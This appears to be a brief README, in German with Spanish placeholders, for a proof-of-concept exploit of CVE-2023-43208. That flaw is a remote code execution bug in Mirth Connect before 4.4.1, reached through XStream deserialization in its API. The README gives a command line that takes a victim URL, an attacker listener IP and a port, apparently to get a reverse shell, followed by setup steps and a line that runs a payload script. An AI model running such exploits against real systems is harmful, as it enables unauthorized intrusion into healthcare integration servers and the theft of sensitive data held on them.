
Explota vulnerabilidad
Dieses Skript ist ein Proof-of-Concept (PoC) für die Schwachstelle der Remotecodeausführung (RCE) in Mirth Connect (Versionen vor 4.4.1). Es nutzt eine XStream-Deserialisierungsschwachstelle über die API aus.
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
Es wird die Verwendung einer virtuellen Umgebung empfohlen:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Ausführung des Payloads
python3 payload.py